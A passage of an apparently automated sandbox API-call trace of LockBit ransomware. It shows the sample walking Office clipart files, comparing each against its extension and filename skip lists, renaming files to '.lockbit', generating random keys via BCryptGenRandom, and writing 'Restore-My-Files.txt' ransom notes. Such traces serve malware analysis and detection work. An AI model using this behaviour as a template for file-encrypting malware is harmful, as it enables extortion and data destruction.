lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0167.155] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0167.155] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0167.155] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0167.155] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0167.155] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0167.155] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0167.155] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0167.155] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0167.158] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0167.158] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0167.158] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0167.158] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0167.158] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0167.158] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0167.158] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0167.158] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0167.158] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0167.158] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0167.158] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0167.158] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0167.158] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0167.158] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0167.158] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0167.158] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0167.158] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0167.158] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0167.159] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0167.159] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0167.159] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0167.159] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0167.159] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0167.159] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0167.159] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0167.159] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0167.159] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0167.159] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0167.159] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0167.159] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0167.159] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="PE00686_.WMF") returned 1 [0167.159] lstrcmpiW (lpString1="ntldr", lpString2="PE00686_.WMF") returned -1 [0167.159] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="PE00686_.WMF") returned -1 [0167.159] lstrcmpiW (lpString1="bootsect.bak", lpString2="PE00686_.WMF") returned -1 [0167.159] lstrcmpiW (lpString1="autorun.inf", lpString2="PE00686_.WMF") returned -1 [0167.159] lstrcmpiW (lpString1="thumbs.db", lpString2="PE00686_.WMF") returned 1 [0167.159] lstrcmpiW (lpString1="iconcache.db", lpString2="PE00686_.WMF") returned -1 [0167.159] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0167.159] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00686_.WMF") returned=".WMF" [0167.159] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0167.159] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0167.159] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0167.159] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0167.159] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0167.160] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0167.160] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0167.160] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0167.160] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0167.160] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0167.160] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0167.160] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0167.160] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0167.160] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0167.160] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0167.160] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0167.160] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0167.160] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0167.160] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0167.160] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0167.160] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0167.160] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0167.161] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0167.161] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0167.161] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0167.161] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0167.161] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0167.161] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0167.161] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00686_.WMF.lockbit") returned 72 [0167.161] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00686_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\pe00686_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0167.162] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0167.162] malloc (_Size=0x40068) returned 0x3df0008 [0167.162] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=4398) returned 1 [0167.162] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.163] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.163] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0167.163] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.164] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.164] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0167.164] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0167.169] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00686_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00686_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0167.169] malloc (_Size=0xa6) returned 0x1fa2ed8 [0167.170] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0167.170] free (_Block=0x1fa2ed8) [0167.170] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00686_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0167.170] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0167.170] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0167.170] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb45d3900, ftCreationTime.dwHighDateTime=0x1bf323f, ftLastAccessTime.dwLowDateTime=0x6cd8b0b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xb45d3900, ftLastWriteTime.dwHighDateTime=0x1bf323f, nFileSizeHigh=0x0, nFileSizeLow=0x1138, dwReserved0=0x0, dwReserved1=0x0, cFileName="PE00693_.WMF", cAlternateFileName="")) returned 1 [0167.170] lstrcmpiW (lpString1=".", lpString2="PE00693_.WMF") returned -1 [0167.171] lstrcmpiW (lpString1="..", lpString2="PE00693_.WMF") returned -1 [0167.171] PathFindExtensionW (pszPath="PE00693_.WMF") returned=".WMF" [0167.171] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0167.171] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0167.171] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0167.171] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0167.171] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0167.171] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0167.171] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0167.171] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0167.171] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0167.171] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0167.171] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0167.171] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0167.171] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0167.171] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0167.171] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0167.171] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0167.171] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0167.171] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0167.171] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0167.171] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0167.171] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0167.171] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0167.171] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0167.171] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0167.172] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0167.172] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0167.172] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0167.172] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0167.172] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0167.172] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0167.172] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0167.172] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0167.172] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0167.172] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0167.172] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0167.172] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0167.172] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0167.172] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0167.172] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0167.172] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0167.172] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0167.172] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0167.172] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0167.172] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0167.172] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0167.172] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0167.172] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0167.172] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="PE00693_.WMF") returned 1 [0167.172] lstrcmpiW (lpString1="ntldr", lpString2="PE00693_.WMF") returned -1 [0167.173] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="PE00693_.WMF") returned -1 [0167.173] lstrcmpiW (lpString1="bootsect.bak", lpString2="PE00693_.WMF") returned -1 [0167.173] lstrcmpiW (lpString1="autorun.inf", lpString2="PE00693_.WMF") returned -1 [0167.173] lstrcmpiW (lpString1="thumbs.db", lpString2="PE00693_.WMF") returned 1 [0167.173] lstrcmpiW (lpString1="iconcache.db", lpString2="PE00693_.WMF") returned -1 [0167.173] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0167.173] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00693_.WMF") returned=".WMF" [0167.173] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0167.173] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0167.173] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0167.173] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0167.173] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0167.173] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0167.173] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0167.173] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0167.173] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0167.173] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0167.173] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0167.173] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0167.173] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0167.173] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0167.173] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0167.173] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0167.173] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0167.173] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0167.174] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0167.174] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0167.174] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0167.174] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0167.174] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0167.174] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0167.174] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0167.174] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0167.174] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0167.174] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0167.174] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00693_.WMF.lockbit") returned 72 [0167.174] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00693_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\pe00693_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0167.175] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0167.175] malloc (_Size=0x40068) returned 0x3df0008 [0167.175] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=4408) returned 1 [0167.175] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.176] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.176] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0167.176] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.177] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.177] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0167.177] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0167.182] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00693_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00693_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0167.182] malloc (_Size=0xa6) returned 0x1fa2ed8 [0167.183] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0167.183] free (_Block=0x1fa2ed8) [0167.183] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00693_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0167.183] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0167.183] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0167.183] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x49cc9e00, ftCreationTime.dwHighDateTime=0x1bd4b2d, ftLastAccessTime.dwLowDateTime=0x6cd8b0b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x49cc9e00, ftLastWriteTime.dwHighDateTime=0x1bd4b2d, nFileSizeHigh=0x0, nFileSizeLow=0x3926, dwReserved0=0x0, dwReserved1=0x0, cFileName="PE00720_.WMF", cAlternateFileName="")) returned 1 [0167.183] lstrcmpiW (lpString1=".", lpString2="PE00720_.WMF") returned -1 [0167.183] lstrcmpiW (lpString1="..", lpString2="PE00720_.WMF") returned -1 [0167.183] PathFindExtensionW (pszPath="PE00720_.WMF") returned=".WMF" [0167.183] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0167.183] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0167.184] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0167.184] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0167.184] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0167.184] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0167.184] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0167.184] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0167.184] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0167.184] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0167.184] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0167.184] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0167.184] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0167.184] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0167.184] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0167.184] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0167.184] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0167.184] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0167.184] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0167.184] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0167.184] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0167.184] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0167.184] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0167.184] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0167.184] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0167.184] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0167.184] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0167.184] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0167.184] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0167.184] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0167.185] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0167.185] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0167.185] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0167.185] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0167.185] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0167.185] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0167.185] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0167.185] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0167.185] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0167.185] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0167.185] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0167.185] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0167.185] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0167.185] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0167.185] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0167.185] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0167.185] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0167.185] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="PE00720_.WMF") returned 1 [0167.185] lstrcmpiW (lpString1="ntldr", lpString2="PE00720_.WMF") returned -1 [0167.185] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="PE00720_.WMF") returned -1 [0167.185] lstrcmpiW (lpString1="bootsect.bak", lpString2="PE00720_.WMF") returned -1 [0167.185] lstrcmpiW (lpString1="autorun.inf", lpString2="PE00720_.WMF") returned -1 [0167.185] lstrcmpiW (lpString1="thumbs.db", lpString2="PE00720_.WMF") returned 1 [0167.185] lstrcmpiW (lpString1="iconcache.db", lpString2="PE00720_.WMF") returned -1 [0167.185] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0167.185] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00720_.WMF") returned=".WMF" [0167.186] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0167.186] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0167.186] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0167.186] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0167.186] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0167.186] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0167.186] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0167.186] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0167.186] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0167.186] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0167.186] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0167.186] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0167.186] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0167.186] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0167.186] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0167.186] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0167.186] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0167.186] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0167.186] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0167.186] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0167.186] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0167.186] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0167.186] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0167.186] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0167.186] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0167.186] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0167.186] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0167.186] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0167.187] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00720_.WMF.lockbit") returned 72 [0167.187] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00720_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\pe00720_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0167.188] CreateIoCompletionPort (FileHandle=0x3cc, 